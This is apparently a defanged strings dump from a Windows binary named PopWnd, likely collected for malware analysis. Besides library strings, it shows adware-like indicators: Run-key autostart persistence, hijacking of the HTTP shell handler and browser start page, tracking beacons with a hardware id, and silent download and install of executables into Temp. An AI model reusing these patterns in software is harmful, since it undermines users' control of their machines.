d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp

!_path.empty()

src\File.cpp

d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp

src\BinaryWriter.cpp

src\Path.cpp

0 <= n && n <= _dirs.size()

!_dirs.empty()

%<>{}|\"^`

https

bad or invalid port number

src\TemporaryFile.cpp

%Y-%m-%dT%H:%M:%S%z

%Y-%m-%dT%H:%M:%s%z

%w, %e %b %y %H:%M:%S %Z

%w, %e %b %Y %H:%M:%S %Z

%w, %d %b %Y %H:%M:%S %Z

%W, %e-%b-%y %H:%M:%S %Z

%W, %e %b %y %H:%M:%S %Z

%w %b %f %H:%M:%S %Y

%Y-%m-%d %H:%M:%S

src\Task.cpp

src\TextConverter.cpp

Windows 3.x

Windows NT

Windows Vista/Server 2008

Windows 7/Server 2008 R2

Windows 8/Server 2012

Windows Server 2003/Windows Server 2003 R2

Windows 95/Windows NT 4.0

x:x:x:x:x:x

src\Process.cpp

inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)

src\NotificationCenter.cpp

src\ThreadPool.cpp

src\TextIterator.cpp

windows-1250

Windows-1250

windows-1251

Windows-1251

windows-1252

Windows-1252

d:\sdk\poco-1.5.4\foundation\src\bignum.h

d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc

d:\sdk\poco-1.5.4\foundation\src\bignum.cc

d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc

d:\sdk\poco-1.5.4\foundation\src\strtod.cc

d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc

src\NumericString.cpp

cannot create named event %s [Error %d: %s]

anonymous pipe

d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp

cannot allocate thread context key

cannot join thread

src\Thread.cpp

src\ErrorHandler.cpp

src\Net.cpp

Network failure while reading HTTP request header

Error reading HTTP request header

No HTTP request header

HTTP request method invalid or too long

HTTP request URI invalid or too long

Invalid HTTP version string

Unsupported Media Type

HTTP Version not supported

No HTTP response header

Invalid HTTP status code

HTTP reason string too long

HTTP/1.0

HTTP/1.1

Cannot set the port number for an already connected session

Cannot set the proxy host and port for an already connected session

Cannot set the proxy port number for an already connected session

hXXp://

src\HTTPSession.cpp

HTTP Exception

Unsupported HTTP redirect (protocol change)

FTP Exception

SMTP Exception

WebSocket Exception

Unknown or unsupported socket family.

src\MessageHeader.cpp

HttpOnly

; HttpOnly

()[]/|\',;

Invalid or unsupported address family passed to IPAddress()

0.0.0.0

Invalid address length passed to IPAddress()

Invalid prefix length passed to IPAddress()

src\SocketAddress.cpp

!hostAndPort.empty()

Missing port number

Invalid address length passed to SocketAddress()

unsupported IP address family

src\HTTPHeaderStream.cpp

src\HTTPStream.cpp

src\HTTPFixedLengthStream.cpp

src\HTTPChunkedStream.cpp

src\SocketImpl.cpp

Operation would block

Operation now in progress

Operation already in progress

Socket operation attempted on non-socket

Protocol not supported

Socket type not supported

Operation not supported

Protocol family not supported

Address family not supported

src\Socket.cpp

255.255.255.255

src\IPAddressImpl.cpp

mask() is only supported for IPv4 addresses

src\HostEntry.cpp

Invalid or unsupported address family passed to StreamSocketImpl

hXXp://VVV.appinf.com/features/no-whitespace-in-element-content

hXXp://xml.org/sax/features/validation

hXXp://xml.org/sax/features/namespaces

hXXp://xml.org/sax/features/namespace-prefixes

hXXp://xml.org/sax/features/external-general-entities

hXXp://xml.org/sax/features/external-parameter-entities

hXXp://xml.org/sax/features/string-interning

hXXp://xml.org/sax/properties/declaration-handler

hXXp://xml.org/sax/properties/lexical-handler

hXXp://VVV.appinf.com/features/enable-partial-reads

src\NamePool.cpp

src\ParserEngine.cpp

Unexpected parser state - please send a bug report

Requested feature requires XML_DTD support in Expat

!_context.empty()

Unsupported SAX feature or property identifier

src\EntityResolverImpl.cpp

src\Element.cpp

src\XMLFilterImpl.cpp

xml=hXXp://VVV.w3.org/XML/1998/namespace

unexpected parser state - please send a bug report

requested feature requires XML_DTD support in Expat

expat_2.1.0

hXXp://VVV.w3.org/XML/1998/namespace

hXXp://VVV.w3.org/2000/xmlns/

0 <= i && i < static_cast<int>(_attributes.size())

src\AttributesImpl.cpp

src\AbstractContainerNode.cpp

Data is specified for a node which does not support data

The implementation does not support the type of object requested

A parameter or an operation is not supported by the underlying object

src\ElementsByTagNameList.cpp

src\AttrMap.cpp

src\DTDMap.cpp

src\ChildNodesList.cpp

hXXp://VVV.w3.org/xmlns/2000/

src\NamespaceSupport.cpp

_contexts.size() > 0

Not a valid registry key

: type not supported

Cannot open registry key:

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

Not a valid root key

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

inflate 1.2.5 Copyright 1995-2010 Mark Adler

Unsupported or invalid date/time format

%w, %e %b %r %H:%M:%S %Z

%W, %e %b %r %H:%M:%S %Z

src\MemoryPool.cpp

src\URIStreamOpener.cpp

src\FileStreamFactory.cpp

uri.isRelative() || uri.getScheme() == "file"

HKEY_CURRENT_USER\Software\%s

day%d

HKEY_USERS\%s\Software\%s

HKEY_USERS\%s\Software\%s\appInstall\%s

HKEY_CURRENT_USER\Software\%s\appInstall\%s

HKEY_USERS\%s\Software\%s\appInstall\

HKEY_CURRENT_USER\Software\%s\appInstall\

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s

..\..\Src\Common\EncryptFile.cpp

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s

%s[%d]

.d

http\shell\open\command

%s /autostart

..\..\Src\Common\CommUtils.cpp

%s[%d]:%s

HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

user32.dll

ntdll.dll

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

?h=X-X-X-X-X-X&r=%s_%s&t=%s&typeid=%d&status=%d&hid=%s&v=%s --- adadsada

?h=X-X-X-X-X-X&r=%s_%s%s&t=%s&hid=%s&v=%s --- adadsada

?h=X-X-X-X-X-X&r=%s_%s%s&onlinetime=%d --- sdadsada

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=0

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=1

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=1

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&Failstate=1

?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0&PreCheck=1

?h=X-X-X-X-X-X&r=%s_%s&d=%s&time=%d&first=%d

url=%s

?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada

?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

G:\pz_git\vendor\inc\Poco/String.h

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d / %d

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\

Rasapi32.dll

kernel32.dll

X:X:X:X:X:X

cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

..\..\Src\Common\Adapter.cpp

X-X-X-X-X-X

%d.%d.%d.%d

Removing %s.

..\..\Src\Download\HttpDownload.cpp

_unlink: %s

No URLs found in %s.

Download quota (%s bytes) EXCEEDED!

FINISHED --%s--

Downloaded: %s bytes in %d files

Converted %d files in %.2f seconds.

Converting %s...

Unable to delete `%s': %s

Cannot convert links in %s: %s

%d-%d

Cannot back up %s as %s: %s

.orig

/index.html

%d; URL=%s

%s: %s: Not enough memory.

d:d:d

utime(%s): %s

d-d-d d:d:d

Failed to _unlink symlink `%s': %s

Get %.0f%% [%d/%d]

%.2f %s

%7.2f %s

Error parsing proxy URL %s: %s.

%s: %s.

Error in proxy URL %s: Must be HTTP.

%d redirections exceeded.

unlink: %s

%s.%d

ftp_proxy

http_proxy

..\..\Src\Download\DownLoadTask.cpp

Syntax error in Set-Cookie: %s at position %d.

Error in Set-Cookie, field `%s'

Cookie coming from %s attempted to set domain to %s

Cannot open cookies file `%s': %s

# Generated by Wget on %s.

# HTTP cookie file.

Error writing to `%s': %s

Error closing `%s': %s

PTF://

hXXp://%s

PTF://%s

Unsupported scheme

Bad port number

IPv6 addresses not supported

%s: %s

d\

index.html

*password*

%s: WGETRC points to %s, which doesn't exist.

%swget.ini

%s: Error in %s at line %d.

%s: Cannot read %s (%s).

%s: Invalid --execute command `%s'

%s: %s: Invalid boolean `%s', use `on' or `off'.

%s: %s: Invalid boolean `%s', use always, on, off, or never.

%s: %s: Invalid number `%s'.

%s: %s: Invalid byte value `%s'

%s: %s: Invalid time period `%s'

%s: %s: Invalid header `%s'.

HTTP/

Reusing connection to %s:%hu.

Referer: %s

User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

POST data file missing: %s

Content-Type: application/x-www-form-urlencoded

Failed writing HTTP request: %s.

%s request sent, awaiting response...

%s %s HTTP/1.0

User-Agent: %s

Host: %s%s%s%s

Accept: %s

%s%s%s%s%s%s%s%s%s%s

Read error (%s) in headers.

- %s

http-equiv=

Location: %s%s

.html

Refusing to truncate existing file `%s'.

(%s to go)

Warning: wildcards not supported in HTTP.

File `%s' already there, will not retrieve.

(try:-)

--%s-- %s

%s => `%s'

Cannot write to `%s' (%s).

ERROR: Redirection (%d) without location.

%s ERROR %d: %s.

Server file no newer than local file `%s' -- not retrieving.

%s (%s) - `%s' saved [%ld/%ld]

%d %s

%s (%s) - `%s' saved [%ld]

%s URL:%s [%ld/%ld] -> "%s" [%d]

%s (%s) - Connection closed at byte %ld.

%s URL:%s [%ld] -> "%s" [%d]

%s (%s) - `%s' saved [%ld/%ld])

%s (%s) - Read error at byte %ld (%s).

%s (%s) - Connection closed at byte %ld/%ld.

%a, %d %b %Y %T

%s (%s) - Read error at byte %ld/%ld (%s).

%a, %d-%b-%Y %T

%A, %d-%b-%y %T

%s:%s

%a %b %d %T %Y

%s: Basic %s

username="%s", realm="%s", nonce="%s", uri="%s", response="%s"

Removing %s since it should be rejected.

http-equiv

%s: Cannot resolve incomplete link %s.

%s: Invalid URL %s: %s

%a %b %e %H:%M:%S %Y

%Y-%m-%d

%m/%d/%y

%I:%M:%S %p

%H:%M:%S

Resolving %s...

Found %s in g_host_name_addresses_map (%p)

failed: %s.

Wget [%.0f%%] %s

Wget %s%s

Starting WinHelp %s

%s%s.HLP

SetThreadExecutionState

Unable to convert `%s' to a bind address. Reverting to ANY.

Connecting to %s:%hu...

Connecting to %s[%s]:%hu...

Logging in as %s ...

%s@%s

The server refuses login.

Login incorrect.

==> TYPE %c ...

Unknown type `%c', closing control connection.

==> CWD %s ...

No such directory `%s'.

==> SIZE %s ...

couldn't connect to %s:%hu: %s

==> PORT ...

socket: %s

Bind error (%s).

Invalid PORT.

REST failed; will not truncate `%s'.

==> RETR %s ...

No such file `%s'.

No such file or directory `%s'.

accept: %s

[%s to go]

Length: %s

%s (%s) - Data connection: %s;

%s: %s, closing control connection.

%s (%s) -

File `%s' already there, not retrieving.

%s URL: %s [%ld] -> "%s" [%d]

.listing

Removed `%s'.

Skipping directory `%s'.

Remote file no newer than local file `%s' -- not retrieving.

Symlinks not supported, skipping symlink `%s'.

%s: corrupt time-stamp.

Remote file is newer than local file `%s' -- retrieving.

%s: unknown/unsupported file type.

%s/%s

Not descending to `%s' as it is excluded/not-included.

Rejecting `%s'.

No matches on pattern `%s'.

Wrote HTML-ized index to `%s'.

Wrote HTML-ized index to `%s' [%ld].

%*s[ skipping %dK ]

=%%

Invalid dot style specification `%s'; leaving unchanged.

-%%

%7.2f%s

ETA %d:d:d

ETA d:d

.netrc

login

password

%s: %s:%d: warning: "%s" token appears before any machine name

%s: %s:%d: unknown token "%s"

Cannot open %s: %s

/robots.txt

Loading robots.txt; please ignore errors.

--> %s

--> PASS Turtle Power!

%s%s%s

331 opiekey

331 s/key

%d,%d,%d,%d,%d,%d

PORT

WINDOWS_NT

Unsupported listing type, trying Unix listing parser.

%s%s%s@

Index of /%s on %s:%d

%d %s d

d:d

<a href="PTF://%s%s:%hu

-> %s

(%s bytes)

G:\pz_git\vendor\inc\Poco/SharedPtr.h

: this object doesn't support resynchronization

StreamTransformation: this object doesn't support random access

: this object does't support a special last block

: this object doesn't support multiple channels

is not a valid key length

G:\pz_git\vendor\inc\Poco/ScopedLock.h

G:\pz_git\vendor\inc\Poco/RefCountedObject.h

%s: Couldn't find usable socket driver.

G:\pz_git\bin\PopWnd.pdb

HttpQueryInfoA

InternetOpenUrlW

WININET.dll

GetProcessHeap

CreatePipe

KERNEL32.dll

GetKeyState

SetWindowsHookExW

UnhookWindowsHookEx

USER32.dll

SetViewportOrgEx

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyExW

RegOpenKeyExW

RegOpenKeyExA

RegOpenKeyA

ADVAPI32.dll

ShellExecuteW

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

IPHLPAPI.DLL

WS2_32.dll

VERSION.dll

GdiplusShutdown

gdiplus.dll

MSIMG32.dll

IMM32.dll

dbghelp.dll

GetCPInfo

PeekNamedPipe

RegQueryInfoKeyA

zcÁ

1.2.5

ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE

.?AVinvalid_operation@Concurrency@@

.?AVunsupported_os@Concurrency@@

.?AVinvalid_scheduler_policy_key@Concurrency@@

.?AVinvalid_oversubscribe_operation@Concurrency@@

.?AUITopologyExecutionResource@Concurrency@@

.?AVExecutionResource@details@Concurrency@@

.?AUIExecutionResource@Concurrency@@

.?AUIExecutionContext@Concurrency@@

.?AVPropertyNotSupportedException@Poco@@

.?AVProcessHandleImpl@Poco@@

.?AVWindows1250Encoding@Poco@@

.?AVWindows1251Encoding@Poco@@

.?AVWindows1252Encoding@Poco@@

.?AVPipeImpl@Poco@@

.?AVHTTPException@Net@Poco@@

.?AVHTTPRequest@Net@Poco@@

.?AVHTTPMessage@Net@Poco@@

.?AVHTTPResponse@Net@Poco@@

.?AVHTTPClientSession@Net@Poco@@

.?AVHTTPSession@Net@Poco@@

.?AVUnsupportedRedirectException@Net@Poco@@

.?AVFTPException@Net@Poco@@

.?AVSMTPException@Net@Poco@@

.?AVWebSocketException@Net@Poco@@

.?AVUnsupportedFamilyException@Net@Poco@@

.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@

.?AVHTTPHeaderStreamBuf@Net@Poco@@

.?AVHTTPHeaderIOS@Net@Poco@@

.?AVHTTPHeaderInputStream@Net@Poco@@

.?AVHTTPHeaderOutputStream@Net@Poco@@

.?AVHTTPStreamBuf@Net@Poco@@

.?AVHTTPIOS@Net@Poco@@

.?AVHTTPInputStream@Net@Poco@@

.?AVHTTPOutputStream@Net@Poco@@

.?AVHTTPFixedLengthStreamBuf@Net@Poco@@

.?AVHTTPFixedLengthIOS@Net@Poco@@

.?AVHTTPFixedLengthInputStream@Net@Poco@@

.?AVHTTPFixedLengthOutputStream@Net@Poco@@

.?AVHTTPChunkedStreamBuf@Net@Poco@@

.?AVHTTPChunkedIOS@Net@Poco@@

.?AVHTTPChunkedInputStream@Net@Poco@@

.?AVHTTPChunkedOutputStream@Net@Poco@@

.?AVSAXNotSupportedException@XML@Poco@@

.?AVCXEventMsg@@

.?AVCXWebBrowser@@

.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@

.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@

.?AVSimpleKeyingInterface@CryptoPP@@

.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@

.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@

.?AVHexEncoder@CryptoPP@@

.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@

.?AVInvalidKeyLength@CryptoPP@@

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe

36.179]:80...

=> `C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26412\popwndup.exe'

17:40:24

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

3(323>3[3

7(727>7[7

=(=2=>=[=

>(>2>>>[>

5%6#7(7:7

8 8$8(8,8084888

2$2-2?2`2

5 5$5(5,5

:':3:^:~:

8 :(:7:?:

5o6

6 6$6(6,606

8 8$8(8,8084888<8

2 2$2(2,2024282<2@2

0 070>0`0

1 272>2`2

9094989<9

4"4,464@4

<(>,>0>4>8><>@>7?>?

6 6$6(6,60646

$0(0,0004080

4 4$4(4,4044484

:,;0;4;8;<;

0004080<0@0

6 727;7]7

8-8Z8}8

0-0Z0}0

6$6,646<6

< <$<(<,<0<4<

1,3034383<3@3

> >$>(>,>0>

>,?0?4?8?<?@?

9 :<:@:`:|:

282@2\2|2

6$6,686\6

1$1,181\1

;(;4;<;\;

(%d),XC_ELE,ID(%d),bShow(%d)

(%d),XC_BUTTON,ID(%d),bShow(%d)

(%d),XC_RADIO,ID(%d),bShow(%d)

(%d),XC_CHECK,ID(%d),bShow(%d)

(%d),XC_EDIT,ID(%d),bShow(%d)

(%d),XC_RICHEDIT,ID(%d),bShow(%d)

(%d),XC_COMBOBOX,ID(%d),bShow(%d)

(%d),XC_SCROLLBAR,ID(%d),bShow(%d)

(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)

(%d),XC_LIST,ID(%d),bShow(%d)

(%d),XC_LISTBOX,ID(%d),bShow(%d)

(%d),XC_TREE,ID(%d),bShow(%d)

(%d),XC_MENUBAR,ID(%d),bShow(%d)

(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)

(%d),XC_SLIDERBAR,ID(%d),bShow(%d)

(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)

(%d),XC_TOOLBAR,ID(%d),bShow(%d)

(%d),XC_STATIC,ID(%d),bShow(%d)

(%d),XC_GROUPBOX,ID(%d),bShow(%d)

(%d),XC_PICTURE,ID(%d),bShow(%d)

(%d),XC_MONTHCAL,ID(%d),bShow(%d)

(%d),XC_DATETIME,ID(%d),bShow(%d)

(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)

(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)

(%d),XC_OUTLOOK,ID(%d),bShow(%d)

(%d),XC_TEXTLINK,ID(%d),bShow(%d)

(%d),XC_TABBAR,ID(%d),bShow(%d)

(%d),XC_GIF,ID(%d),bShow(%d)

(%d),XC_EDITFILE,ID(%d),bShow(%d)

(%d),XC_LISTVIEW,ID(%d),bShow(%d)

(%d),XC_PANE,ID(%d),bShow(%d)

(%d),XC_DRAGBAR,ID(%d),bShow(%d)

(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)

(%d),XC_CAPTION,ID(%d),bShow(%d)

(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)

(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)

(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)

